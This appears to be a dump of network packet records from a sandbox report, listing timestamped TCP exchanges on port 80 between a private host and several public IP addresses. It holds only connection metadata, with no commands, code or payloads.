                                                                                                                                                                              Sep 15, 2023 07:26:28.412698030 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.412714005 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.412755966 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.412797928 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.412802935 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.412802935 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.412823915 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.412853956 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.412873983 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.412899017 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.412993908 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.413233042 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.413301945 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.413352966 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.413373947 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.413378954 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.413424015 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.413459063 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.413539886 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.413575888 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.413625956 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.413675070 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.413737059 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.413757086 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.413785934 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.414119005 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.414227962 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.414243937 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.414272070 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.414293051 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.414385080 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.414391994 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.414443016 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.414482117 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.414526939 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.414561987 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.414629936 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.414642096 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.414690971 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.415009022 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.415107965 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.415133953 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.415164948 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.415186882 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.415268898 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.415277004 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.415312052 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.415319920 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.415332079 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.415359974 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.415390968 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.456841946 CEST8049851103.224.182.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.467055082 CEST804985269.163.239.62192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.467143059 CEST4985280192.168.2.369.163.239.62
                                                                                                                                                                              Sep 15, 2023 07:26:28.520505905 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.520648003 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.520652056 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.520695925 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.520710945 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.520735979 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.520746946 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.520775080 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.520797014 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.520823002 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.520848989 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.520895958 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.520920038 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.520977020 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.521080971 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.521122932 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.521790028 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.521830082 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.521848917 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.521873951 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.521936893 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.521986961 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.522126913 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.522165060 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.522176981 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.522212982 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.522274017 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.522321939 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.522376060 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.522428989 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.522450924 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.522509098 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.522519112 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.522566080 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.522598982 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.522649050 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.522696972 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.522742987 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.522804976 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.522847891 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.522986889 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.523032904 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.523150921 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.523194075 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.523227930 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.523269892 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.523350000 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.523391962 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.523551941 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.523595095 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.523628950 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.523672104 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.523726940 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.523767948 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.523969889 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.524012089 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.524045944 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.524087906 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.524122000 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.524162054 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.524209023 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.524255991 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.524399996 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.524444103 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.524477959 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.524521112 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.524591923 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.524647951 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.524801970 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.524851084 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.524863005 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.524904013 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.524991035 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.525034904 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.525069952 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.525126934 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.525160074 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.525207043 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.525240898 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.525284052 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.525484085 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.525528908 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.525697947 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.525741100 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.525775909 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.525820971 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.525855064 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.525899887 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.525986910 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.526027918 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.526051998 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.526091099 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.526125908 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.526173115 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.526403904 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.526457071 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.576975107 CEST804981360.43.154.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.577946901 CEST4981380192.168.2.360.43.154.138
                                                                                                                                                                              Sep 15, 2023 07:26:28.624922037 CEST8049853210.140.73.39192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.628221989 CEST8049853210.140.73.39192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.628293037 CEST4985380192.168.2.3210.140.73.39
                                                                                                                                                                              Sep 15, 2023 07:26:28.630852938 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.630960941 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.631005049 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.631036043 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.631052971 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.631103992 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.631294012 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.631411076 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.631417990 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.631462097 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.631510019 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.631565094 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.631602049 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.631653070 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.631712914 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.631786108 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.631829023 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.631850004 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.631867886 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.631922960 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.631975889 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.632045031 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.632193089 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.632272005 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.632317066 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.632345915 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.632441998 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.632504940 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.632554054 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.632575989 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.632579088 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.632644892 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.632736921 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.632827044 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.632846117 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.632884979 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.633002996 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.633094072 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.633114100 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.633167982 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.633205891 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.633224964 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.633299112 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.633369923 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.633394957 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.633411884 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.633505106 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.633560896 CEST8049842104.26.10.81192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.633605957 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.633635998 CEST4984280192.168.2.3104.26.10.81
                                                                                                                                                                              Sep 15, 2023 07:26:28.654196978 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.654254913 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.654289961 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.654330969 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.654340029 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.654376984 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.654437065 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.654480934 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.654541969 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.654603958 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.654644012 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.654691935 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.654717922 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.654757977 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.654818058 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.654948950 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.654985905 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.654985905 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.655035973 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.655081034 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.655158997 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.655196905 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.655201912 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.655236006 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689076900 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689142942 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689183950 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689224958 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689263105 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689296007 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689302921 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689316988 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689342976 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689347029 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689393044 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689460993 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689511061 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689536095 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689585924 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689605951 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689645052 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689661980 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689692974 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689714909 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689753056 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689763069 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689800978 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689821959 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689857960 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.689866066 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.689904928 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.690108061 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.690146923 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.690160036 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.690184116 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.690193892 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.690227985 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.690256119 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.690293074 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.690300941 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.690334082 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.690741062 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.690783024 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.690790892 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.690824032 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.691009045 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.691047907 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.691066027 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.691086054 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.691097975 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.691132069 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.704118967 CEST4985680192.168.2.372.44.93.236
                                                                                                                                                                              Sep 15, 2023 07:26:28.724803925 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.724844933 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.724883080 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.724920034 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.724925995 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.724960089 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.724977016 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.724977016 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.724998951 CEST8049854104.21.66.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:28.725033998 CEST4985480192.168.2.3104.21.66.46
                                                                                                                                                                              Sep 15, 2023 07:26:28.725038052 CEST8049854104.21.66.46192.168.2.3
